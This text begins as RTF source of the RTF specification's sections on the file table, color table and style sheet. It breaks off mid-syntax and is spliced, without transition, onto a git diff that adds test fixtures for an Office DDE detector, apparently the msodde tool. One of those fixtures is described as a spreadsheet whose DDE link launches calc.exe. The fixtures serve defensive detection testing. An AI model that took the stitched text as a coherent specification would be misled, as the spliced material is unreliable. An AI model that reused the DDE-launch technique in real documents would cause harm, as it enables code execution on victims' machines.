{\*\bkmkstart _Toc380819779}{\*\bkmkstart _Toc381591826}{\*\bkmkstart _Toc382644187}{\*\bkmkstart _Toc383176018}{\*\bkmkstart _Toc386002176}{\*\bkmkstart _Toc386539807}{\*\bkmkstart File_Table}{\*\bkmkstart _Toc519492442}{\*\bkmkstart _Toc521909686}
File Table}{{\*\bkmkend _Ref281718621}{\*\bkmkend _Toc313960805}{\*\bkmkend _Toc335399079}{\*\bkmkend _Toc380819779}{\*\bkmkend _Toc381591826}{\*\bkmkend _Toc382644187}{\*\bkmkend _Toc383176018}{\*\bkmkend _Toc386002176}{\*\bkmkend _Toc386539807}
{\*\bkmkend File_Table}{\*\bkmkend _Toc519492442}{\*\bkmkend _Toc521909686}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The }{\b \\filetbl}{
control word introduces the file table destination. The only time a file table is created in RTF is when the document contains subdocuments. The file table group defines the files referenced in the document and has the following syntax:
\par }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright { \cell '\{\\*' }{\b \\filetbl }{('\{' '\}')+ '\}'\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd
\trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\cell \\}{\b file}{ ?? + \cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\widctlpar\intbl\adjustright {\cell }{\b\i \\fid }{\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\cell }{\b \\}{\b\i frelative}{ \cell }\pard \widctlpar\intbl\adjustright {\row
}\pard \sa120\widctlpar\intbl\adjustright {\cell \\}{\b\i fosnum}{\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\cell }{\b \\fvalidmac}{ | }{\b \\fvaliddos}{ | }{\b \\fvalidntfs}{ | }{\b \\
fvalidhpfs}{ | }{\b \\fnetwork | \\fnonfilesys}{\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\cell }\pard\plain
\s71\sa240\widctlpar\intbl\adjustright \f1\fs20\cgrid {#PCDATA\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard \sa120\widctlpar\adjustright {
\par Note that the file name can be any valid alphanumeric string for the named file system, indicating the complete path and file name.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Control word\cell Meaning\cell }\pard \widctlpar\intbl\adjustright {\b
\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\filetbl\cell }{A list of documents referenced by the current document. The file table
has a structure analogous to the style or font table. This is a destination control word output as part of the document header. \cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\file\cell }{
Marks the beginning of a file group, which lists relevant information about the referenced file. This is a destination control word.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fid}{\b\i N}{\b \cell }{
File ID number. Files are referenced later in the document using this number.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\frelative}{\b\i N}{\b \cell }{
The character position within the path (starting at 0) where the referenced file's path starts to be relative to the path of the owning document. For example, if a document is saved to the path C:\\Private\\Resume\\
File1.doc and its file table contains the path C:\\Private\\Resume\\Edu\\File2.doc, then that entry in the file table will be }{\b \\frelative}{18, to point at the character "e" in "edu". This allows preservation of relative paths.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fosnum}{\b\i N}{\b \cell }{Currently only filled in for paths from the Macintosh file system. It is an operating system\endash
specific number for identifying the file, which may be used to speed up access to the file or find the file if it has been moved to another folder or disk. The Macintosh operating system name for this number is the "file id." Additional meanings of the }{
\b \\fosnum}{\b\i N }{control word may be defined for other file systems in the future.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fvalidmac\cell }{Macintosh file system.\cell }\pard
\widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fvaliddos\cell }{MS-DOS file system.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\intbl\adjustright {\b \\fvalidntfs\cell }{NTFS file system.
\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\keepn\widctlpar\intbl\adjustright {\b \\fvalidhpfs\cell }\pard \sa120\widctlpar\intbl\adjustright {HPFS file system.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\widctlpar\intbl\adjustright {\b \\fnetwork\cell }{Network file system. This control word may be used in conjunction with any of the previous file source control words.\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep
\clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b \\fnonfilesys\cell }{Indicates http/odma.\cell }\pard \widctlpar\intbl\adjustright {\row }\pard\plain
\s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Ref281717028}{\*\bkmkstart _Toc313960806}{\*\bkmkstart _Toc335399080}{\*\bkmkstart _Toc380819780}{\*\bkmkstart _Toc381591827}{\*\bkmkstart _Toc382644188}
{\*\bkmkstart _Toc383176019}{\*\bkmkstart _Toc386002177}{\*\bkmkstart _Toc386539808}{\*\bkmkstart Color_Table}{\*\bkmkstart _Toc519492443}{\*\bkmkstart _Toc521909687}Color Table{\*\bkmkend _Ref281717028}{\*\bkmkend _Toc313960806}{\*\bkmkend _Toc335399080}
{\*\bkmkend _Toc380819780}{\*\bkmkend _Toc381591827}{\*\bkmkend _Toc382644188}{\*\bkmkend _Toc383176019}{\*\bkmkend _Toc386002177}{\*\bkmkend _Toc386539808}{\*\bkmkend Color_Table}{\*\bkmkend _Toc519492443}{\*\bkmkend _Toc521909687}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The }{\b \\colortbl}{ control word introduces the color table group, which defines screen colors, character colors, and other color information. The color table group has the following syntax:
\par }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\cell }{\lang1040 '\{' }{\b\lang1040 \\colortbl}{\lang1040 + '\}'\cell }\pard
\widctlpar\intbl\adjustright {\lang1040 \row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\cell }{\b\i \\red}{ ? & }{\b\i \\green}{ ? &}{\b\i \\blue}{ ? ';'
\cell }\pard \widctlpar\intbl\adjustright {\row }\pard \sa120\widctlpar\adjustright {
\par The following are valid control words for this group.
\par }\trowd \trleft432\trkeep\trhdr \clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx2160\clvertalt\clbrdrb\brdrs\brdrw15 \cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {\b Control word\cell Meaning\cell }\pard \widctlpar\intbl\adjustright {\b
\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sb120\sa120\widctlpar\intbl\adjustright {\b \\red}{\b\i N}{\b \cell }{Red index\cell }\pard \widctlpar\intbl\adjustright {\row }\pard
\sa120\widctlpar\intbl\adjustright {\b \\green}{\b\i N}{\b \cell }{Green index\cell }\pard \widctlpar\intbl\adjustright {\row }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright {
\b \\blue}{\b\i N}{\b \cell }\pard\plain \s71\sa240\widctlpar\intbl\adjustright \f1\fs20\cgrid {Blue index\cell }\pard\plain \widctlpar\intbl\adjustright \f1\fs20\cgrid {\row }\pard \sa120\widctlpar\adjustright {
\par Each definition must be delimited by a semicolon, even if the definition is omitted. If a color definition
is omitted, the RTF reader uses its default color. The following example defines the default color table used by Word. The first color is omitted, as shown by the semicolon following the}{\b \\colortbl }{
control word. The missing definition indicates that color 0 is the \lquote \rquote auto\rquote \rquote color.
\par }\pard\plain \s70\li432\sa120\widctlpar\adjustright \f2\fs16\cgrid {\{\\colortbl;\\red0\\green0\\blue0;\\red0\\green0\\blue255;\\red0\\green255\\blue255;\\red0\\green255\\blue0;\\red255\\green0\\blue255;\\red255\\green0\\blue0;\\red255\\green255\\blue0;\\
red255\\green255\\blue255;\\red0\\green0\\blue128;\\red0\\green128\\blue128;\\red0\\green128\\blue0;\\red128\\green0\\blue128;\\red128\\green0\\blue0;\\red128\\green128\\blue0;\\red128\\green128\\blue128;\\red192\\green192\\blue192;\}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The foreground and background colors use indexes into the color table to define a color. For more information on color setup, see your Windows documentation.
\par The following example defines a block of text in color (where supported). Note that the }{\b cf}{/}{\b cb}{ index is the index of an entry in the color table, which represents a red/green/blue color combination.
\par }\pard\plain \s70\li432\sa120\widctlpar\adjustright \f2\fs16\cgrid {\{\\f1\\cb1\\cf2 This is colored text. The background is color\line 1 and the foreground is color 2.\}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {If the file is translated for software that does not display color, the reader ignores the color table group.
\par }\pard\plain \s3\sb240\sa240\keepn\widctlpar\outlinelevel2\adjustright \b\f1\fs28\cgrid {{\*\bkmkstart _Style_Sheet}{\*\bkmkstart _Ref281714441}{\*\bkmkstart _Ref281719807}{\*\bkmkstart _Toc313960807}{\*\bkmkstart _Toc335399081}{\*\bkmkstart _Toc380819781
}{\*\bkmkstart _Toc381591828}{\*\bkmkstart _Toc382644189}{\*\bkmkstart _Toc383176020}{\*\bkmkstart _Toc386002178}{\*\bkmkstart _Toc386539809}{\*\bkmkstart StyleSheet}{\*\bkmkstart _Toc519492444}{\*\bkmkstart _Toc521909688}{\*\bkmkend _Style_Sheet}
Style Sheet{\*\bkmkend _Ref281714441}{\*\bkmkend _Ref281719807}{\*\bkmkend _Toc313960807}{\*\bkmkend _Toc335399081}{\*\bkmkend _Toc380819781}{\*\bkmkend _Toc381591828}{\*\bkmkend _Toc382644189}{\*\bkmkend _Toc383176020}{\*\bkmkend _Toc386002178}
{\*\bkmkend _Toc386539809}{\*\bkmkend StyleSheet}{\*\bkmkend _Toc519492444}{\*\bkmkend _Toc521909688}
\par }\pard\plain \sa120\widctlpar\adjustright \f1\fs20\cgrid {The }{\b \\stylesheet}{ control word introduces the style sheet g
roup, which contains definitions and descriptions of the various styles used in the document. All styles in the document's style sheet can be included, even if not all the styles are used. In RTF, a style is a form of shorthand used to specify a set of ch
aracter, paragraph, or section formatting.
\par The style sheet group has the following syntax:
\par }\trowd \trleft432\trkeep \clvertalt\cltxlrtb \cellx2160\clvertalt\cltxlrtb \cellx10080\pard \sa120\widctlpar\intbl\adjustright { \cell '\{' }{\b \\stylesheet }{
+
+
+
+
+ This spread sheet has a dde link which starts calc.exe |
+
+
+ #REF! |
+
+
+
+
+
+
+
+
+
+
+
+ 3
+ 1
+ 2
+
+
+ False
+ False
+
+
+
+
+
+
+
+
+
+
+ False
+ False
+
+
+
+
+
+
+
+
+
+
+ False
+ False
+
+
+
diff --git a/tests/test-data/msodde/dde-in-word2003.xml.zip b/tests/test-data/msodde/dde-in-word2003.xml.zip
new file mode 100644
index 00000000..1ef53733
Binary files /dev/null and b/tests/test-data/msodde/dde-in-word2003.xml.zip differ
diff --git a/tests/test-data/msodde/dde-in-word2007.xml.zip b/tests/test-data/msodde/dde-in-word2007.xml.zip
new file mode 100644
index 00000000..97b500d1
Binary files /dev/null and b/tests/test-data/msodde/dde-in-word2007.xml.zip differ
diff --git a/tests/test-data/msodde/dde-test-from-office2003.doc.zip b/tests/test-data/msodde/dde-test-from-office2003.doc.zip
new file mode 100644
index 00000000..77a84c02
Binary files /dev/null and b/tests/test-data/msodde/dde-test-from-office2003.doc.zip differ
diff --git a/tests/test-data/msodde/dde-test-from-office2013-utf_16le-korean.doc.zip b/tests/test-data/msodde/dde-test-from-office2013-utf_16le-korean.doc.zip
new file mode 100644
index 00000000..b0a6aae4
Binary files /dev/null and b/tests/test-data/msodde/dde-test-from-office2013-utf_16le-korean.doc.zip differ
diff --git a/tests/test-data/msodde/dde-test-from-office2016.doc.zip b/tests/test-data/msodde/dde-test-from-office2016.doc.zip
new file mode 100644
index 00000000..4d72e9bb
Binary files /dev/null and b/tests/test-data/msodde/dde-test-from-office2016.doc.zip differ
diff --git a/tests/test-data/msodde/dde-test.docm b/tests/test-data/msodde/dde-test.docm
new file mode 100644
index 00000000..ee5362a8
Binary files /dev/null and b/tests/test-data/msodde/dde-test.docm differ
diff --git a/tests/test-data/msodde/dde-test.docx b/tests/test-data/msodde/dde-test.docx
new file mode 100644
index 00000000..5fba6b29
Binary files /dev/null and b/tests/test-data/msodde/dde-test.docx differ
diff --git a/tests/test-data/msodde/dde-test.xlsb b/tests/test-data/msodde/dde-test.xlsb
new file mode 100644
index 00000000..0e8fd7e4
Binary files /dev/null and b/tests/test-data/msodde/dde-test.xlsb differ
diff --git a/tests/test-data/msodde/dde-test.xlsm b/tests/test-data/msodde/dde-test.xlsm
new file mode 100644
index 00000000..0740182f
Binary files /dev/null and b/tests/test-data/msodde/dde-test.xlsm differ
diff --git a/tests/test-data/msodde/dde-test.xlsx b/tests/test-data/msodde/dde-test.xlsx
new file mode 100644
index 00000000..33c828df
Binary files /dev/null and b/tests/test-data/msodde/dde-test.xlsx differ
diff --git a/tests/test-data/msodde/harmless-clean-2003.xml b/tests/test-data/msodde/harmless-clean-2003.xml
new file mode 100644
index 00000000..477069f7
--- /dev/null
+++ b/tests/test-data/msodde/harmless-clean-2003.xml
@@ -0,0 +1,3 @@
+
+
+user user 2 0 2017-10-26T09:10:00Z 2017-10-26T09:10:00Z 1 39 250 2 1 288 16